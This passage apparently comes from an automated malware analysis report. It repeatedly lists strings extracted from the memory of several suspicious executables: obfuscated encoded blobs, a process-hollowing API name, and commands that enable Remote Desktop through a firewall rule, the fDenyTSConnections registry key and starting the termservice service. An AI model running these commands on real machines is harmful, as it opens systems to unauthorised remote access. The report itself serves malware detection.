RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: KI2Q1PIQVVVTNGJPW8.exe, 0000000D.00000003.1538310324.0000000004B10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: KI2Q1PIQVVVTNGJPW8.exe, 0000000D.00000003.1538310324.0000000004B10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000E.00000000.1554237441.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000E.00000000.1554237441.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000E.00000002.1556407722.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000E.00000002.1556407722.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000F.00000000.1879452431.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000F.00000000.1879452431.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000F.00000002.2534625292.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000F.00000002.2534625292.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 1s89v4.exe.0.dr	String found in binary or memory: net start termservice
Source: 1s89v4.exe.0.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD 